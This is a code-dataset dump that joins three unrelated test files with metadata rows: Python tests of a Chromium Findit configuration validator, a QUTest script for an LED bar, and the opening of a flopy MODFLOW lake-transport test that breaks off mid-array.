'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': {}, # Should be an int.
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': [], # Should be an int.
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': None, # should be an int.
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 1, # Should be a string.
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 3.2, # Should be a string.
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1.0, # Should be an int.
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': '300', # Should be an int.
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': [] # Should be an int.
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_secondds': 10,
'server_retry_timeout_hours': {} # Should be an int.
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_secondds': 10,
'server_retry_timeout_hours': 1,
'maximum_server_contact_retry_interval_seconds': '' # Should be an int.
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_secondds': 10,
'server_retry_timeout_hours': 1,
'maximum_server_contact_retry_interval_seconds': 2,
'should_retry_server': 3 # Should be a bool.
}))
self.assertTrue(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': 1,
'maximum_server_contact_retry_interval_seconds': 1,
'should_retry_server': False,
}))
def testValidateDownloadBuildDataSettings(self):
self.assertFalse(config._ValidateDownloadBuildDataSettings({}))
self.assertFalse(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': {}, # Should be an int.
'memcache_master_download_expiration_seconds': 10,
'use_chrome_build_extract': True
}))
self.assertFalse(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': [], # Should be an int.
'use_chrome_build_extract': True
}))
self.assertFalse(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': 3600,
'use_chrome_build_extract': 'blabla' # Should be a bool.
}))
self.assertTrue(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': 3600,
'use_chrome_build_extract': False
}))
def testConfigurationDictIsValid(self):
self.assertTrue(config._ConfigurationDictIsValid({
'steps_for_masters_rules': {
'supported_masters': {
'master1': {
'unsupported_steps': ['step1', 'step2'],
},
'master2': {
'supported_steps': ['step3'],
'check_global': False
}
},
'global': {
'unsupported_steps': ['step5'],
}
}
}))
self.assertFalse(config._ConfigurationDictIsValid([]))
self.assertFalse(config._ConfigurationDictIsValid({
'this_is_not_a_valid_property': []
}))
def testFormatTimestamp(self):
self.assertIsNone(config._FormatTimestamp(None))
self.assertEqual('2016-02-25 01:02:03',
config._FormatTimestamp(
datetime.datetime(2016, 2, 25, 1, 2, 3, 123456)))
def testPostConfigurationSettings(self):
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
params = {
'format': 'json',
'data': json.dumps({
'steps_for_masters_rules': {
'supported_masters': {
'a': {
},
'b': {
'supported_steps': ['1'],
'unsupported_steps': ['2', '3', '4'],
},
'c': {
'supported_steps': ['5'],
'check_global': False
}
},
'global': {
'unsupported_steps': ['1']
}
},
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS
})
}
response = self.test_app.post('/config', params=params)
expected_response = {
'masters': {
'supported_masters': {
'a': {
},
'b': {
'supported_steps': ['1'],
'unsupported_steps': ['2', '3', '4'],
},
'c': {
'supported_steps': ['5'],
'check_global': False
}
},
'global': {
'unsupported_steps': ['1']
}
},
'builders': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS,
'version': 1,
'latest_version': 1,
'updated_by': 'test',
'updated_ts': response.json_body.get('updated_ts')
}
self.assertEquals(expected_response, response.json_body)
def testValidateActionSettings(self):
self.assertFalse(config._ValidateActionSettings({}))
self.assertTrue(config._ValidateActionSettings(
{
'cr_notification_build_threshold': 2,
'cr_notification_latency_limit_minutes': 1000,
}))
def testValidateFlakeAnalyzerTryJobRerunSettings(self):
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings({}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 1, # Should be a float.
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 'a', # Should be a float.
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': [], # Should be an int.
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': {}, # Should be an int.
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 3.2, # Should be an int.
}))
self.assertTrue(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 4,
}))
def testValidateFlakeAnalyzerSwarmingRerunSettings(self):
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings({}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 1, # Should be a float.
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 'a', # Should be a float.
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': [], # Should be an int.
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': {}, # Should be an int.
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 3.2, # Should be an int.
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 4,
'max_build_numbers_to_look_back': 'a', # Should be an int.
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 4,
'max_build_numbers_to_look_back': 100,
'use_nearby_neighbor': [] # Should be a bool.
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'update_monorail_bug': 'True', # Should be a bool.
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'update_monorail_bug': True,
'max_dive_in_a_row': 4.0, # Should be an int.
'dive_rate_threshold': 0.4,
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'update_monorail_bug': True,
'dive_rate_threshold': 40, # Should be a float.
}))
self.assertTrue(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True,
'update_monorail_bug': True,
'max_dive_in_a_row': 4,
'dive_rate_threshold': 0.4,
}))
| 37.495117 | 80 | 0.607683 | 3,609 | 38,395 | 6.045165 | 0.079523 | 0.053628 | 0.075079 | 0.01123 | 0.858184 | 0.834579 | 0.817115 | 0.782692 | 0.754228 | 0.745565 | 0 | 0.025874 | 0.27626 | 38,395 | 1,023 | 81 | 37.531769 | 0.759249 | 0.039172 | 0 | 0.702062 | 0 | 0 | 0.355692 | 0.161335 | 0 | 0 | 0 | 0 | 0.110309 | 1 | 0.016495 | false | 0 | 0.009278 | 0 | 0.027835 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f0d67582ba20bab7ff41cc3f6afb0a571bca9c62 | 2,410 | py | Python | Reference/qpc/examples/qutest/unity_mock/test/test_LedBar.py | Harveyhubbell/Paid-RTOS | e56a1346cce026428c2bfef05b6a4e6bb2ee7f4e | [
"MIT"
] | null | null | null | Reference/qpc/examples/qutest/unity_mock/test/test_LedBar.py | Harveyhubbell/Paid-RTOS | e56a1346cce026428c2bfef05b6a4e6bb2ee7f4e | [
"MIT"
] | null | null | null | Reference/qpc/examples/qutest/unity_mock/test/test_LedBar.py | Harveyhubbell/Paid-RTOS | e56a1346cce026428c2bfef05b6a4e6bb2ee7f4e | [
"MIT"
] | null | null | null | # test-script for QUTest unit testing harness
# see https://www.state-machine.com/qtools/qutest.html
# preambe...
# tests...
test("LedBar 0% all off")
command(0, 0)
expect("@timestamp LED_MOD Led_off 0")
expect("@timestamp LED_MOD Led_off 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 0 0")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 100% all on", NORESET)
command(0, 100)
expect("@timestamp LED_MOD Led_on 10 0")
expect("@timestamp LED_MOD Led_on 20 1")
expect("@timestamp LED_MOD Led_on 10 2")
expect("@timestamp LED_MOD Led_on 20 3")
expect("@timestamp LED_MOD Led_on 10 4")
expect("@timestamp USER+000 LedBar_setPercent 70 100")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 19% all off", NORESET)
command(0, 19)
expect("@timestamp LED_MOD Led_off 0")
expect("@timestamp LED_MOD Led_off 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 0 19")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 20% one on", NORESET)
command(0, 20)
expect("@timestamp LED_MOD Led_on 10 0")
expect("@timestamp LED_MOD Led_off 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 10 20")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 50% two on", NORESET)
current_obj(OBJ_AP, 'led_power')
poke(0, 4, pack('<LL', 25, 15))
command(0, 50)
expect("@timestamp LED_MOD Led_on 25 0")
expect("@timestamp LED_MOD Led_on 15 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 40 50")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 99% four on", NORESET)
probe('Led_on', 17)
probe('Led_on', 13)
command(0, 99)
expect("@timestamp TstProbe Fun=Led_on,Data=17")
expect("@timestamp LED_MOD Led_on 17 0")
expect("@timestamp TstProbe Fun=Led_on,Data=13")
expect("@timestamp LED_MOD Led_on 13 1")
expect("@timestamp LED_MOD Led_on 10 2")
expect("@timestamp LED_MOD Led_on 20 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 60 99")
expect("@timestamp Trg-Done QS_RX_COMMAND")
| 33.013699 | 54 | 0.752282 | 420 | 2,410 | 4.114286 | 0.157143 | 0.381944 | 0.3125 | 0.364583 | 0.805556 | 0.805556 | 0.760417 | 0.657407 | 0.657407 | 0.532986 | 0 | 0.064186 | 0.107884 | 2,410 | 72 | 55 | 33.472222 | 0.739535 | 0.048133 | 0 | 0.5 | 0 | 0 | 0.665647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0b077165f45bd13bb4fd7b2b6a0fcc96b5ee6f98 | 82,246 | py | Python | autotest/t060_test_lkt.py | tikiri/Jayantha-Obeysekera | 184e716ff40c64506778bd15585254a11f92037f | [
"CC0-1.0",
"BSD-3-Clause"
] | 1 | 2021-03-17T09:15:54.000Z | 2021-03-17T09:15:54.000Z | autotest/t060_test_lkt.py | tikiri/Jayantha-Obeysekera | 184e716ff40c64506778bd15585254a11f92037f | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | autotest/t060_test_lkt.py | tikiri/Jayantha-Obeysekera | 184e716ff40c64506778bd15585254a11f92037f | [
"CC0-1.0",
"BSD-3-Clause"
] | 1 | 2021-08-05T19:11:27.000Z | 2021-08-05T19:11:27.000Z | """
Bug discovered in LKT with multi-species. Adding test to check this functionality
"""
import os
import sys
import platform
import numpy as np
import flopy
# make the working directory
tpth = os.path.join('temp', 't057')
if not os.path.isdir(tpth):
os.makedirs(tpth)
mfnwt_exe = 'mfnwt'
mt3d_usgs_exe = 'mt3dusgs'
ismfnwt = flopy.which(mfnwt_exe)
ismt3dusgs = flopy.which(mt3d_usgs_exe)
def test_lkt_with_multispecies():
modelpth = tpth
modelname = 'lkttest'
mfexe = 'mfnwt'
mtexe = 'mt3dusgs'
# Instantiate MODFLOW object in flopy
mf = flopy.modflow.Modflow(modelname=modelname, exe_name=mfexe, model_ws=modelpth, version='mfnwt')
Lx = 27500.0
Ly = 22000.0
nrow = 44
ncol = 55
nlay = 3
delr = Lx / ncol
delc = Ly / nrow
xmax = ncol * delr
ymax = nrow * delc
X, Y = np.meshgrid(np.linspace(delr / 2, xmax - delr / 2, ncol),
np.linspace(ymax - delc / 2, 0 + delc / 2, nrow))
## Instantiate output control (oc) package for MODFLOW-NWT
oc = flopy.modflow.ModflowOc(mf)
## Instantiate solver package for MODFLOW-NWT
# Newton-Raphson Solver: Create a flopy nwt package object
headtol = 1.0E-4
fluxtol = 5
maxiterout = 5000
thickfact = 1E-06
linmeth = 2
iprnwt = 1
ibotav = 1
nwt = flopy.modflow.ModflowNwt(mf, headtol=headtol, fluxtol=fluxtol, maxiterout=maxiterout,
thickfact=thickfact, linmeth=linmeth, iprnwt=iprnwt, ibotav=ibotav,
options='SIMPLE')
## Instantiate discretization (DIS) package for MODFLOW-NWT
top1 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2.015692E+02, 2.01E+02, 2.02E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.015957E+02, 2.019755E+02, 2.02E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.52E+02, 0, 0, 0,
0, 0, 0, 0, 0, 1.93E+02, 1.935120E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.01E+02, 2.02E+02, 2.02E+02, 2.03E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.48E+02, 3.48E+02, 3.50E+02, 3.52E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.933555E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.019790E+02, 2.02E+02, 2.03E+02, 2.03E+02, 2.04E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.37E+02, 3.43E+02, 3.48E+02, 3.48E+02, 3.49E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.932550E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.36E+02, 3.36E+02, 3.43E+02, 3.48E+02, 3.48E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.93E+02, 1.933208E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.09E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.19E+02, 3.19E+02, 3.29E+02, 3.36E+02, 3.36E+02, 3.36E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.93E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2.50E+02, 2.51E+02, 0, 0, 0, 0, 0, 0, 2.91E+02, 3.17E+02, 3.17E+02, 3.17E+02, 3.29E+02, 3.29E+02, 3.29E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.17E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 0, 0, 0, 0, 0, 0, 2.48E+02, 2.49E+02, 2.50E+02, 2.51E+02, 2.52E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.88E+02, 2.91E+02, 3.03E+02, 3.10E+02, 3.10E+02, 3.17E+02, 3.17E+02, 3.17E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.15E+02, 2.17E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.46E+02, 2.48E+02, 2.48E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.79E+02, 2.88E+02, 2.96E+02, 3.03E+02, 3.03E+02, 3.10E+02, 3.10E+02, 3.11E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.51E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.79E+02, 2.79E+02, 2.91E+02, 2.96E+02, 2.96E+02, 3.03E+02, 3.10E+02, 3.10E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.48E+02, 2.50E+02, 2.51E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.72E+02, 2.75E+02, 2.79E+02, 2.80E+02, 2.91E+02, 2.91E+02, 2.96E+02, 2.96E+02, 2.96E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.50E+02, 2.50E+02, 2.53E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.79E+02, 2.79E+02, 2.80E+02, 2.88E+02, 2.91E+02, 2.91E+02, 2.91E+02, 0, 0,
